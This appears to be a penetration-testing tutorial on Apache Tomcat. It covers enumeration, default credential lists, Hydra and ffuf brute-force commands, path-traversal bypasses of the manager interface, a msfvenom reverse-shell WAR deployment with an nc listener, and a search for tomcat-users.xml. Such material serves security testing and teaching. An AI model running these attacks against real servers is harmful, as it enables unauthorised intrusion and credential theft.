Apache Tomcat

Theory

Apache Tomcat (called "Tomcat" for short) is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a "pure Java" HTTP web server environment in which Java code can also run.

Practice

Enumeration

We can attempt to trigger an error on the website as a method of fingerprinting. If the error is similar as the one below, this indicates that the website is running Tomcat.

$ curl http://target.com/DoesNotExist

To find the version of Apache Tomcat, a simple command can be executed:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.

Identifying the exact locations of /manager and /host-manager directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages.

ffuf -u https://example.com/FUZZ -w directories.txt
ffuf -u https://example.com/host-manager/FUZZ -w 
ffuf -u https://example.com/manager/FUZZ -w directories.txt

Below are common directories for Apache Tomcat.

/examples
/examples/jsp/cal/login.html
/examples/jsp/error/error.html
/examples/jsp/snp/snoop.jsp
/examples/servlet/HelloWorldEXample
/examples/servlet/JndiServlet
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestParamExample

/host-manager

/manager
/manager/jmxproxy/?qry=STUFF
/manager/status
/manager/status/all
# We can execute commands in /manager/text/ directory
/manager/text/{command}?{parameters}
/manager/text/deploy?path=/foo
/manager/text/list
/manager/text/resources
/manager/text/serverinfo
/manager/text/vminfo

It's possible to enumerate usernames through metasploit:

It only works for Tomcat versions older than 6

msf> use auxiliary/scanner/http/tomcat_enum
msf> set TARGETURI /manager  # depending on the website

Credentials

The /manager/html directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:

admin:(empty)
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat

To attempt a brute force attack on the manager directory, we may use one of the following commands:

# FFUF
ffuf -u https://tomcat:FUZZ@example.com/manager -w passwords.txt -fs 140

# Hydra
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f <TARGET> http-get /manager/html

Common Vulnerabilities

In some vulnerable configurations of Tomcat you can gain access to protected directories in Tomcat using the path: /..;/

So, for example, you might be able to access the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html

Another way to bypass protected paths using this trick is to access http://www.vulnerable.com/;param=value/manager/html

Accessing /auth.jsp may reveal the password in a backtrace under fortunate circumstances.

The CVE-2007-1860 vulnerability in mod_jk allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.

In order to access to the management web of the Tomcat go to: pathTomcat/%252E%252E/manager/html

Remote Code Execution (RCE)

If you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script).

First create a war file using Msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=80 -f war -o shell.war

Then upload this file.

curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"

Start a listener in local machine.

sudo rlwrap nc -lvnp 80

Now access to https://example.com/shell. We should get a shell.

Post-Exploitation

If we are in the target system, we can retrieve information about credentials.

find / -name "tomcat-users.xml" 2>/dev/null
cat tomcat-users.xml

Resources

Last updated 2 months ago